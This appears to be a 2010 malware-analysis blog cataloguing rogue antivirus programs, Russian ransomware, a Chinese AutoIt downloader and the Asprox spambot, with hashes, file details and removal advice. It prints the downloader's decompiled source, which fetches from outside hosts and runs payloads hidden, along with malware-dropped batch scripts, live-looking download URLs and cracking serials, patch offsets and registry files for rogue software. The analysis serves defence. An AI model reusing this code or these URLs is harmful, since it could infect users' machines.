wtf XyliBox
Malware Analysis
root[main] # Accueil | Virus Worldmap | Signaler l'adresse internet d'un malware | Computers Now | E:VOLUTION

Bienvenue sur Xylibox, projet qui a pour but d'analyser tous type de malware
Vous pouvez signaler un abus grâce au formulaire adéquat et voir la liste des sites potentiellement dangereux signalés par d'autres utilisateurs.

Cliqué sur une notification, pour développer celle-ci.
Contact:


/Xylitol

wtf
[Stay secure] Prevent malware


[Xylibox] Malware notification 2010/06/22 - Security Central (Rogue)
  • Localisation: http://my-security-central.com/
  • Original Name: Unknown
  • File Type : Exe, Size : 942080 (0E6000h) Byte(s)
  • Packer: Unknown
  • EP: 000010B0
  • EP Offset: 000010B0
  • EP Section: .text
  • Linker: 6.0
  • SHA1: 8567C73FA5E704295176F7B26829878C20435140
  • Info additionnel: Security Central is a fake Antivirus tool. It is from the same rogue family as Home Personal Antivirus, XP Deluxe Protector, Win PC Antivirus, Win PC Defender, XP Police Antivirus, IE-Security, WinDefender 2009 and Total Secure 2009.
    If your PC is infected with this, run MBAM to remove the infection.


  • mail: phoenixbytes@live.fr
    serial: X84HW8D55UFUGST


    Once registered, Security Central doesn't detect infections anymore (same system, no cleanings).
    There is no more fake alerts and disturbing warning messages...
    Easy proof of a scareware application.
    If your PC is infected with Security Central, use MBAM to remove the infection.

  • Highslide JS Highslide JS Highslide JS Highslide JS Highslide JS



[Xylibox] Malware notification 2010/06/21 - flash_player.exe [Updated] (Ransomware, cracking session)
  • Localisation: http://apornovideo.ru/flash_player.exe
  • Original Name: Unknown
  • File Type : Exe, Size : 135168 (021000h) Byte(s)
  • Packer: Unknown
  • EP: 000010DD
  • EP Offset: 000004DD
  • EP Section: .text
  • Linker: 6.0
  • SHA1: d8d1860b9f11263b502cc5d91c9775fcddc5c630
  • Info additionnel: When executed, it is making a copy of itself in /%ALLUSERSPROFILE%/Media/ with the name "movies.exe" a batch file called "rdb.bat" are also here.
    The ransomware displays an invasive message box in Russian, and block some applications like taskmgr, regedit etc...
    If your PC is infected with this, run MBAM to remove the infection.


  • First serial to enter: 62907349
    Second serial: 49752406


  • Highslide JS Highslide JS



[Xylibox] Malware notification 2010/06/20 - XP Antivirus 2008 (Rogue, cracking session)
  • Localisation: http://www.avxp2008.com/
  • Original Name: Unknown
  • File Type : Exe, Size : 9462272 (0906200h) Byte(s)
  • Packer: Custom
  • EP: 00005C61
  • EP Offset: 00005C61
  • EP Section: .text
  • Linker: 7.10
  • SHA1: 7d081a1053cd9ef3d593f5ef9a27303824b779f5 (rhc90dj0et2n.exe)
  • Info additionnel: XP Antivirus 2008 is a fake security software (rogue).
    It displays fake alerts to justify an infection to incite users into buying a license.
    From the same family of Desktop Security 2010, i mean same key check.
    If your PC is infected with XP Antivirus 2008, run MBAM to remove the infection.


  • Patching way:
    1) Make a breakpoint on 0043E907
    2) Enter any serial
    3) Change the value 00 on DS:[01365d20] by 01
    4) Enjoy


  • Highslide JS Highslide JS Highslide JS Highslide JS Highslide JS



[Xylibox] Malware notification 2010/06/20 - flash_player.exe (Ransomware, cracking session)
  • Localisation: I've lost the link ¬.¬
  • Un petit merci a Siri pour le chan irc, vous faite du super boulot avec vos bots a malware, keep up :]
  • Original Name: Unknown
  • File Type : Exe, Size : 68608 (010C00h) Byte(s)
  • Packer: Unknown
  • EP: 00001066
  • EP Offset: 00000466
  • EP Section: .text
  • Linker: 8.0
  • SHA1: 293c853735e3df483453e4659d70ca955674c4ba
  • Info additionnel: When executed, it is making a copy of itself in /%ALLUSERSPROFILE%/Media/ with the name "movies.exe" a batch file called "rdb.bat" are also here.
    The ransomware displays an invasive message box in Russian, and block some applications like taskmgr, regedit etc...
    If your PC is infected with this, run MBAM to remove the infection.


  • First serial to enter: 28527548
    Second serial: 35676549


  • Highslide JS Highslide JS Highslide JS Highslide JS Highslide JS



[Xylibox] Malware notification 2010/06/20 - Anti-Virus Number-1 (Rogue)
  • Localisation: http://70.38.11.165/
  • Original Name: Unknown
  • File Type : Exe, Size : 11122688 (0A9B800h) Byte(s)
  • Packer: Unknown
  • EP: 000353CC
  • EP Offset: 000347CC
  • EP Section: .text
  • Linker: 9.0
  • SHA1: 3588D0F572311BF80906C0072BBB75D78EB88A72 (n1.exe)
  • Info additionnel: Antivirus-1 is a rogue from february 2009 (fake security software).
    It belongs to the same family as Total Virus Protection, Antivirus Sentry, Antivirus 2010, Micro Antivirus 2009, MS Antivirus, Smart Antivirus 2009, System Antivirus 2008, Antivirus 2009, Internet-antivirus
    If your PC is infected with Anti-Virus Number-1, use MBAM to remove the infection.


  • Email: phoenixbytes@live.fr
    Serial: 873465112334272 or 78629310938


  • Highslide JS Highslide JS Highslide JS Highslide JS Highslide JS



[Xylibox] Malware notification 2010/06/19 - XP Antivirus (Rogue, cracking session)
  • Localisation: http://xpantivirus.com/
  • Original Name: Unknown
  • File Type : Exe, Size : 463872 (071400h) Byte(s)
  • Packer: UPX
  • EP: 00154FB0
  • EP Offset: 000573B0
  • EP Section: UPX1
  • Linker: 2.25
  • SHA1: A11D3F8B0899FB27AFDD61A37800288457EA01B5 (xpa.exe)
  • Info additionnel: XP Antivirus is a fake security software (rogue).
    It displays fake alerts to justify an infection to incite users into buying a license.
    If your PC is infected with XP Antivirus, use MBAM to remove the infection.

  • The serial check was done on the server and the server was dead so there is no key.
    We cant register this rogue
    so patch it:
    00497FFA . /0F85 29020000 JNZ 00498229 -> NOP this line !
    then you have done the work.
    Also another good news: This is a stupid rogue
    The rogue juste check if there is an registry entry about the registration, he doesn't care if the serial is good or bad :)
    so, regfile the shit:

    REGEDIT4

    [HKEY_CURRENT_USER\Software\XP antivirus\Options]
    "FirstRunUrl"="http://www.traffic-converter.biz/firstrun.php?product=%product%&aff=%aff%&email=%email%&update=%update%&os=%os%"
    "AfterRegisterUrl"="http://www.traffic-converter.biz/afterreg.php?product=%product%&aff=%aff%&email=%email%&update=%update%&os=%os%"
    "LabelUrl"=""
    "TermsUrl"="http://www.XPAntivirus.com/eula.php"
    "HelpURL"="http://xpantivirus.com/help.php"
    "BillingURL"="https://secure.sweeptransact.com/Billing/API/CheckLicense.aspx?Email=%email%&TransactionKey=%transactionkey%&AffiliateID=%aff%"
    "BillingUrlApproved"="https://secure.sweeptransact.com/Billing/API/CheckLicense.aspx?Email=%email%&TransactionKey=%transactionkey%&AffiliateID=%aff%&RegistrationCompleted=1"
    "TransactionKey"="XsHrUGEutblgVFNM"
    "BillingRegURL"="http://xpantivirus.com/register.php"
    "SecurityVector"="000000000"
    "Scans"="1"
    "LastScan"="17.06.2010 22:15:50"
    "Transaction"="DD40A8C75F668A0D4F026372D827A75A"
    "RegEmail"="phoenixbytes@live.fr"
    "RegCode"="Fuck the key !"



  • Highslide JS Highslide JS Highslide JS Highslide JS Highslide JS



[Xylibox] Malware notification 2010/06/19 - Green AV (Rogue)
  • Localisation: http://www.my-green-av-pre.com/
  • Original Name: Unknown
  • File Type : Exe, Size : 753664 (0B8000h) Byte(s)
  • Packer: Unknown
  • EP: 00A85B23
  • EP Offset: 000ABF23
  • EP Section: 3
  • Linker: 6.0
  • SHA1: 1943A0682A58CF07568B30215134103B565E6183 (rwg.exe)
  • Info additionnel: Green AV is another fake security software (rogue).
    Green AV is a fake security software (rogue).
    It displays fake alerts to justify an infection to incite users into buying a license.
    It belongs to the same: AntivirusBEST, Eco Antivirus 2010, Total Virus Protection, Anti-Virus Number-1, Antivirus Sentry, Antivirus 2010, Micro Antivirus 2009, MS Antivirus, Smart Antivirus 2009, System Antivirus 2008, Antivirus 2009, Internet-antivirus If your PC is infected with Green AV, use MBAM to remove the infection.

  • Email: phoenixbytes@live.fr
    Serial: WZlJ3RzVncpa05WQg4


  • Highslide JS Highslide JS Highslide JS Highslide JS Highslide JS



[Xylibox] Malware notification 2010/06/18 - Antivirus Plus (Rogue, cracking session)
  • Localisation: http://antivirusplus1.com/
  • Original Name: Unknown
  • File Type : Exe, Size : 2370560 (0242C00h) Byte(s)
  • Packer: Unknown
  • EP: 0000E71C
  • EP Offset: 0000DB1C
  • EP Section: .text
  • Linker: 9.0
  • SHA1: 997C4D37E4FB33DBD6FCBF8942C6210E17B88211 (AntiVirus Plus.1.exe)
  • Info additionnel: AntivirusPlus is another fake security software (rogue).
    This scareware is not new, but it was not very active.
    Recently, more fake online scanners advertise Antivirus Plus for removal tool.

    If the rogue detects a lot of infections (all inexistent), once registered, it propose to remove them.
    If we don't accept (ALT-F4 to quit) they have all disappeared on next execution.
    Email: phoenixbytes@live.fr
    Serial: 9827569362578384 or 8748349485784030


  • Highslide JS Highslide JS Highslide JS Highslide JS Highslide JS


    If your PC is infected with Antivirus Plus use MBAM to remove the infection.

[Xylibox] Malware notification 2010/06/18 - Antivirus 2009 (Rogue)
  • Localisation: http://secured-liveupdate.com/
  • Original Name: Unknown
  • File Type : Exe, Size : 1478656 (0169000h) Byte(s)
  • Packer: Unknown
  • EP: 00001296
  • EP Offset: 00001296
  • EP Section: .text
  • Linker: 11.14
  • SHA1: 7D5C84DB2732CB2E3EFDDF04C8DB3976D27759ED (av2009.exe)
  • Info additionnel: Antivirus 2009 rogue replace the original SP2 Security Center by its own.
  • It was from the Anti200X family: Live Security Suite, Live Entreprise Suite, Personal Security, Cyber Security, AntivirusBest, Total Security, Total Virus Protection, Anti-Virus Number-1, Antivirus 360, Antivirus Sentry, Internet Antivirus Pro, PC Protection Center 2008, Antivirus 2010, eAntivirusPro, AntiMalware 2009, Micro Antivirus 2009, XPert Antivirus, Power Antivirus, Advanced Antivirus, MS Antivirus
    Email: phoenixbytes@live.fr
    Serial: 0429682-95N-LKSJDLKJ53Y09


  • Highslide JS Highslide JS Highslide JS Highslide JS Highslide JS


    If your PC is infected with Security Master AV use MBAM or SmitfraudFix to remove the infection.

[Xylibox] Malware notification 2010/06/18 - Security Master AV (Rogue, cracking session #4)
  • Localisation: http://www5.securitymasterav.com/
  • Original Name: Unknown
  • File Type : Exe, Size : 2048512 (01F4200h) Byte(s)
  • Packer: Custom
  • EP: 00004390
  • EP Offset: 00003790
  • EP Section: .code
  • Linker: 7.0
  • SHA1: 6495438eae6482317b8cc57ef42782b232efdfe4 (SM511e.exe)
  • Info additionnel: Security Master AV is a fake Antivirus from may. This rogue drops files on the system and detects them as infected to scare users; files are filled with junk data and do not represent a risk.
    It was on the same family of: My Security Engine, Security Guard, CleanUp Antivirus and Security Antivirus

  • Serial: UEPB-H4KA-S2LA-U2FD

    This rogue was damn hard to crack.
  • Highslide JS Highslide JS Highslide JS Highslide JS Highslide JS
    Highslide JS Highslide JS Highslide JS Highslide JS Highslide JS
    Highslide JS Highslide JS Highslide JS Highslide JS Highslide JS


    Security Master AV comes from fake online scanners and porn sites
    If your PC is infected with Security Master AV use MBAM to remove the infection.

[Xylibox] Malware notification 2010/06/17 - AntivirusBEST (Rogue, cracking session #3)
  • Localisation: http://70.38.11.165/admin/cgi-bin/get_domain.php?type=download
  • Original Name: Unknown
  • File Type : Exe, Size : 11345408 (0AD1E00h) Byte(s)
  • Packer: Custom
  • EP: 000371C3
  • EP Offset: 000365C3
  • EP Section: .text
  • Linker: 9.0
  • SHA1: 334B7B9A10369F991530613E90652241D13539F7 (abest.exe)
  • Info additionnel: Antivirus Best is a fake security software (rogue). It displays fake alerts to justify an infection to incite users into buying a license.
    It belongs to the same: Eco Antivirus 2010, Total Virus Protection, Anti-Virus Number-1, Antivirus Sentry, Antivirus 2010, Micro Antivirus 2009, MS Antivirus, Smart Antivirus 2009, System Antivirus 2008, Antivirus 2009, Internet-antivirus


  • Email: phoenixbytes@live.fr
    Serial: 873465112334272 or 78629310938

  • Highslide JS Highslide JS Highslide JS Highslide JS


    If your PC is infected with AntivirusBEST, use MBAM to remove the infection.

[Xylibox] Malware notification 2010/06/17 - Eco Antivirus 2010 (Rogue, cracking session #2)
  • Localisation: http://www.eco-av.com/
  • Original Name: Unknown
  • File Type : Exe, Size : 750076 (0B71FCh) Byte(s)
  • Packer: Custom
  • EP: 00A40080
  • EP Offset: 0009B880
  • EP Section: .ultra
  • Linker: 9.0
  • SHA1: CB6CAB7217103CBEDE81578BF94E51367AC2C2C8 (msv.exe)
  • Info additionnel: Eco Antivirus 2010 displays a lot of disturbing warning messages pushing users to purchase a license.

  • Name: XyliboxFrance
    Serial: 7755-3334-8977-1235-5555

  • Highslide JS Highslide JS Highslide JS Highslide JS


    If your PC is infected with Eco Antivirus 2010 rogue, use MBAM to remove the infection.

[Xylibox] Malware notification 2010/06/16 - Desktop Security 2010 (Rogue, cracking session #1)
  • Localisation: http://www.windesktopsecurity2010.com/
  • Original Name: Unknown
  • File Type : Exe, Size : 3235840 (0316000h) Byte(s)
  • Packer: Custom
  • EP: 00003F1D
  • EP Offset: 0000331D
  • EP Section: .CODE
  • Linker: 2.25
  • SHA1: 9b53d9d031d62b2baf1efbeaad5fa55981efa61a (Desktop Security 2010.exe)
  • Info additionnel: Desktop Security 2010 displays a lot of disturbing warning messages pushing users to purchase a license.
  • Highslide JS Highslide JS Highslide JS Highslide JS Highslide JS
    Highslide JS Highslide JS Highslide JS Highslide JS Highslide JS
    Highslide JS Highslide JS Highslide JS Highslide JS Highslide JS


    If your PC is infected with Desktop Security 2010 rogue, use MBAM to remove the infection.
    Adviso by a colleague

[Xylibox] Malware notification 2010/06/13 - File Name: soft.exe
  • Localisation: http://www.ie6browsers.info/2/index.php
  • Original Name: Unknown
  • File Type : Exe, Size : 367147 (059A2Bh) Byte(s)
  • Packer: UPX [unknown / modified] compressed !
  • EP: 000B0DE0
  • EP Offset: 0003C1E0
  • EP Section: .UPX1
  • Linker: 9.0
  • Info additionnel: Compiled Script: AutoIt v3 Script: 3, 3, 6, 1
  • SHA1: a56028294c53c56925c9bf0ba3984d6bb1ad8290

  • ####[UNPACKED]####
  • File Type : Exe, Size : 725035 (0B102Bh) Byte(s)
  • EP: 00016310
  • EP 00015710
  • EP Section: .text
    Text strings referenced in soft:.text, item 534
  • Info additionnel:
    Address=00431AA4
    Disassembly=PUSH 004846D8
    Text string=ASCII "This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support."
    Navigate to: "http://lab.l4ever.cn/ip/Api/"
    Navigate to: "http://db.union.download.kingsoft.com/union/union/DUBA2011_down_31_18466.exe" (Chinese AV)
  • Decompiled Source code:
    #NoTrayIcon
    FileInstall("1.exe", @TempDir & "\" & @ScriptName)
    $TXT = ""
    For $T = 1 To 10
    $USERN1 = ""
    For $U = 1 To 6
    $USERN1 = $USERN1 & Chr(Random(97, 122, 1))
    Next
    $USERN2 = ""
    For $U = 1 To 4
    $USERN2 = $USERN2 & Random(0, 9, 1)
    Next
    $USERN3 = ""
    For $U = 1 To Random(1, 3, 1)
    $USERN3 = $USERN3 & Chr(Random(65, 90, 1))
    Next
    $TXT = $TXT & $USERN1 & $USERN2 & $USERN3 & @CRLF
    Next
    FileWrite(@TempDir & "\" & @ScriptName, $TXT)
    RunWait(@TempDir & "\" & @ScriptName)
    FileDelete(@TempDir & "\" & @ScriptName)
    $A06E0C0522A = 0
    FileDelete(@TempDir & "\900210122.idx")
    $A1AE0E02A5C = InetGet("http://lab.l4ever.cn/ip/Api/", @TempDir & "\900210122.idx", 1, 0)
    If @error Then
    $A06E0C0522A = 1
    Else
    $A11E0F04E51 = FileReadLine(@TempDir & "\900210122.idx", 1)
    ;### Tidy Error: If/ElseIf statement without a then..
    If StringInStr($A11E0F04E51, "
    Nwm") OR STRINGINSTR($A11E0F04E51, " _lς") THEN
    $A06E0C0522A = 1
    Else
    EndIf
    FileDelete(@TempDir & "\900210122.idx")
    EndIf
    If $A06E0C0522A = 0 Then
    FileInstall("forqd125.exe", @AppDataCommonDir & "\forqd125.exe")
    RunWait(@AppDataCommonDir & "\forqd125.exe")
    $OPENWEB = "http://121.10.107.50/11.html?kaishi"
    Run(@ComSpec & " /c " & "start " & $OPENWEB, "", @SW_HIDE)
    Local $A23F000291E = InetGet("http://db.union.download.kingsoft.com/union/union/DUBA2011_down_31_18466.exe", @AppDataCommonDir & "\DUBA2011_down_31_18466.exe", 1, 1)
    Do
    Sleep(250)
    Until INETGETINFO($A23F000291E, 2)
    Local $A30F010363F = INETGETINFO($A23F000291E, 0)
    INETCLOSE($A23F000291E)
    Run(@AppDataCommonDir & "\DUBA2011_down_31_18466.exe")
    WinWaitActive("Ñ'q\Òk8—2

  • Name: 1.exe
  • File Type : Exe, Size : 163840 (028000h) Byte(s)
  • Packer: Unknown
  • EP: 00004772
  • EP Offset: 00004772
  • EP Section: .text
  • Linker: 6.0
  • Info additionnel: Downloader/Loader
  • SHA1: 7c3260f22f5b69b8e18308c8bc91a3e448b4f43a
  • Navigue to: http://www.my8899.com/ - http://www.2345.com/tg10.htm - http://www.2345.com/css/sd_1.css
  • The following directories were created:
    /%ProgramFiles%/SogouInput
    /%ProgramFiles%/SogouInput/5.0.0.3787
    /%ProgramFiles%/Winrar

    4 files was created in /%ProgramFiles%/SogouInput/5.0.0.3787 (all file ares same)
    cgi-bin.knl:
    StockP.knl: (Firstly located in /%temp%/ with the name "winrar.knl")
    Wrapper.knl:
    Obfuscated.knl (This file was deleted after)

    Decoded them for a bit:

  • The following Registry Keys are created:
    • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.knl
    • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.qc
    • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\qcfile
    • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\qcfile\CLSID
    • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\qcfile\DefaultIcon
    • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\qcfile\shell
    • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\qcfile\shell\open
    • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\qcfile\shell\open\command
    • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\qcfile\shellex
    • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\qcfile\shellex\ContextMenuHandlers
    • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\qcfile\shellex\IconHandler
    • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\wFile
    • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\wFile\DefaultIcon
    • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\wFile\ScriptEngine
    • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\wFile\Shell
    • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\wFile\Shell\Edit
    • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\wFile\Shell\Edit\Command
    • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\wFile\Shell\Open
    • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\wFile\Shell\Open\Command
    • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\wFile\Shell\Open2
    • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\wFile\Shell\Open2\Command
    • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\wFile\Shell\Print
    • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\wFile\Shell\Print\Command
    • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\wFile\ShellEx
    • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\wFile\ShellEx\DropHandler
    • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\wFile\ShellEx\PropertySheetHandlers
    • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\wFile\ShellEx\PropertySheetHandlers\WSHProps
    • HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host
    • HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings
    A shortcut "Internet Explorer" was added to the desktop
    Internet Explorer main page changed by "http://www.my8899.com/"
  • Create a .bat file:
    @echo off
    :err
    del /f /q C:\DOCUME~1\ADMINI~1\Bureau\1.exe
    if exits C:\DOCUME~1\ADMINI~1\Bureau\1.exe goto err
    del %0


  • Name: forqd125.exe [CLEAN] (Chinese program PPTV downloader)
  • File Type : Exe, Size : 58832 (0E5D0h) Byte(s)
  • Packer: Unknown
  • EP: 000047F0
  • EP Offset: 000047F0
  • EP Section: .text
  • Linker: 6.0
  • Info additionnel: Downloader
  • SHA1: 2e9d113d7053e70a88257d25574414ccffad1713
  • Download a Chinese clean program

  • Name: pplivesetup_forqd125.exe [CLEAN] (Chinese program PPTV Setup)
  • File Type : Exe, Size : 10748552 (0A40288h) Byte(s)
  • Packer: Nullsoft SFX Setup v2.46
  • EP: 000033AD
  • EP Offset: 000027AD
  • EP Section: .text
  • Linker: 9.0
  • Info additionnel: Installer, SFX
  • SHA1: 9245bff38c9cb1327585846e0c60aa529951916c

  • Highslide JS Highslide JS Highslide JS Highslide JS Highslide JS
    Highslide JS Highslide JS Highslide JS

[Xylibox] Malware notification 2010/06/13 - GuardSoft, Ltd: Defense Center (Rogue)
  • Localisation: http://edsprofit.com/customers/installer.php?pid=DEFCNT_BASIC
  • Original filename: Unknown
  • File Type : Exe, Size : 93696 (016E00h) Byte(s)
  • Packer: Unknown
  • EP: 00001004
  • EP Offset: 00000404
  • EP Section: .text
  • Linker: 9.0
  • SHA1: e595025ad2b2c7d9ee2c544c644a545b45684600
  • Additional info: Rogue... nothing news

    Regfile:

    REGEDIT4

    [HKEY_LOCAL_MACHINE\SOFTWARE\Defense Center]

    "License"="94804860143697233939975370329435970097710202"
    "Email"="phoenixbytes@live.fr"

    If your PC is infected with Defense Center use MBAM to remove the infection.

    Exe fix WinXP/Vista:

    Windows Registry Editor Version 5.00

    [HKEY_CLASSES_ROOT\.EXE]
    @="exefile"
    "Content Type"="application/x-msdownload"

    [HKEY_CLASSES_ROOT\.EXE\PersistentHandler]
    @="{098f2470-bae0-11cd-b579-08002b30bfeb}"

    [HKEY_CLASSES_ROOT\exefile]
    @="Application"
    "EditFlags"=hex:38,07,00,00
    "FriendlyTypeName"=hex(2):40,00,25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,\
      00,6f,00,6f,00,74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,\
      32,00,5c,00,73,00,68,00,65,00,6c,00,6c,00,33,00,32,00,2e,00,64,00,6c,00,6c,\
      00,2c,00,2d,00,31,00,30,00,31,00,35,00,36,00,00,00

    [HKEY_CLASSES_ROOT\exefile\DefaultIcon]
    @="%1"

    [HKEY_CLASSES_ROOT\exefile\shell]

    [HKEY_CLASSES_ROOT\exefile\shell\open]
    "EditFlags"=hex:00,00,00,00

    [HKEY_CLASSES_ROOT\exefile\shell\open\command]
    @="\"%1\" %*"
    "IsolatedCommand"="\"%1\" %*"

    [HKEY_CLASSES_ROOT\exefile\shell\runas]

    [HKEY_CLASSES_ROOT\exefile\shell\runas\command]
    @="\"%1\" %*"
    "IsolatedCommand"="\"%1\" %*"

    [HKEY_CLASSES_ROOT\exefile\shellex]

    [HKEY_CLASSES_ROOT\exefile\shellex\DropHandler]
    @="{86C86720-42A0-1069-A2E8-08002B30309D}"

    [-HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe\UserChoice]

  • Highslide JS Highslide JS Highslide JS Highslide JS



[Xylibox] Malware notification 2010/06/12 - File Name: ie.exe
  • Localisation: www.eyx8.com/down/ie.exe
  • Original filename: Unknown
  • File Type : Exe, Size : 53248 (0D000h) Byte(s)
  • Packer: Unknown
  • EP: 000017D4
  • EP Offset: 000017D4
  • EP Section: .text
  • Linker: 6.0
  • SHA1: error
  • Additional info: Create many registry key
    HKEY_CLASSES_ROOT\CLSID\{C42EB5A1-0EED-E549-91B0-153485860016}
    HKEY_CURRENT_USER\Software\Classes\CLSID\{C42EB5A1-0EED-E549-91B0-153485860016}
    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{C42EB5A1-0EED-E549-91B0-153485860016}
    HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C42EB5A1-0EED-E549-91B0-153485860016}
    HKEY_USERS\S-1-5-21-73586283-790525478-1801674531-500\Software\Classes\CLSID\{C42EB5A1-0EED-E549-91B0-153485860016}
    HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}
    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}
    HKEY_USERS\S-1-5-21-73586283-790525478-1801674531-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{C42EB5A1-0EED-E549-91B0-153485860016}
    HKEY_USERS\S-1-5-21-73586283-790525478-1801674531-500_Classes\CLSID\{C42EB5A1-0EED-E549-91B0-153485860016}
    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu
    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel
    HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved
    HKEY_USERS\S-1-5-21-73586283-790525478-1801674531-500\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}
    HKEY_USERS\S-1-5-21-73586283-790525478-1801674531-500\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu
    HKEY_USERS\S-1-5-21-73586283-790525478-1801674531-500\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel

  • Highslide JS Highslide JS Highslide JS



[Xylibox] Malware notification 2010/06/12 - File Name: Browser_Update.exe
  • Localisation: www.intercinema.ru/Browser_Update.exe
  • Original filename: Unknown
  • File Type : Exe, Size : 48640 (0BE00h) Byte(s)
  • Packer: Unknown
  • EP: 000006E4
  • EP Offset: 000006E4
  • EP Section: .text
  • Linker: 6.0
  • SHA1: error
  • Additional info: Anti debug, 0x4006FA, nop the shit.
    Create registry key: HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\Main - DEPOff:1
    Create 0041.DLL in /system32/
    Modify many registry values about 0041.DLL
    Create a file WORK.DAT on the same folder (/system32/)
    Open RegSvr32.exe and register 0041.DLL silently, the dll uncrypt "WINLOGON, IEXPLORE, FIREFOX"
    and after i've got some problem for continue to debug it...

  • Highslide JS Highslide JS Highslide JS Highslide JS



[News] Malware notification 2010/06/08 - File Name: spb.exe, Asprox Botnet, The Resurrection.


    Asprox, a spambot we have not seen active for over a year... now back.

  • Localisation: www.ursagates.co.uk/templates/rt_solarsentinel_j15/images/bo dy/white/spb.exe (spb for SPamBot ?)
  • Original filename: Unknown
  • File Type : Exe, Size : 92672 (016A00h) Byte(s)
  • Packer: UPX 0.89.6 - 1.02 / 1.05 - 2.90 -> Markus & Laszlo [Overlay]
  • SHA1: 9ff6ddc475d5041b6fa0ed7b5795b95520ff4e75

  • ####[UNPACKED]####
  • File Type : Exe, Size : 117248 (01CA00h) Byte(s)
  • EP: 0000A900
  • EP Offset: 00009D00
  • EP Section: .code
  • Linker: 10.0
  • Additional info: Create a lot of news registry keys, news files appears:
    /%TEMP%/_check32.bat
    /%System%/aspimgr.exe

    _check32.bat:

    :Repeat
    del "C:\Documents and Settings\Administrateur\Bureau\spb.exe"
    if exist "C:\Documents and Settings\Administrateur\Bureau\spb.exe" goto Repeat


    aspimgr.exe


  • Service created: aspimgr "Microsoft ASPI Manager": C:\WINDOWS\system32\aspimgr.exe


    Whois lookup:
    domain:     ML63AMGSTART.RU
    nserver:    ns1.ml63amgstart.ru. 72.252.193.94
    nserver:    ns2.ml63amgstart.ru. 98.244.20.222
    nserver:    ns3.ml63amgstart.ru. 76.181.108.122
    nserver:    ns4.ml63amgstart.ru. 69.134.222.78
    state:      REGISTERED, DELEGATED, VERIFIED
    person:     Private Person
    phone:      +79766542344
    e-mail:     ssa21@yandex.ru
    registrar:  NAUNET-REG-RIPN
    created:    2010.05.23
    paid-till:  2011.05.23
    source:     TCI

  • Phoning home:

    Response:

    UPDATE.BIN" file:



    UPDATE.BIN


    New data received...


    Who actualy done nothing.
  • [PDF] Anatomy of the Asprox Botnet by Dennis Brown
  • [WEB] ThreatExpert Submission aspimgr.exe

[Xylibox] Malware notification 2010/06/08 - File Name: setup.exe
  • Localisation: www.veropoema.net/setup.exe
  • Original filename: Unknown
  • File Type : Exe, Size : 98816 (018200h) Byte(s)
  • Packer: Unknown
  • EP: 00001C7F
  • EP Offset: 0000107F
  • EP Section: .text
  • Linker: 9.0
  • SHA1: 7fd08c6a9602c20924e807cc448621eba265cba9
  • Additional info: Trojan, create/read some registry keys, register a drivers, add the file to the startup list.
    you can see some interesting stuff at: 0040144A
    HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager
    PendingFileRenameOperations:
    \??\C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\4.tmp

    \??\C:\WINDOWS\TEMP\5.tmp

    \??\C:\WINDOWS\TEMP\6.tmp

  • Highslide JS Highslide JS Highslide JS



[Xylibox] Malware notification 2010/06/04 - Security Tool (Rogue)
  • Localisation: http://soldierantivirus.com/install/setup.exe
  • FileName: 12800213.exe
  • File Type : Exe, Size : 832000 (0CB200h) Byte(s)
  • Packer: Custom
  • EP: 00001000
  • EP Offset: 00000400
  • EP Section: .text
  • Linker: 0.0
  • SHA1: 8163ce37d0dc43195f6f0f9092206c216dab7348
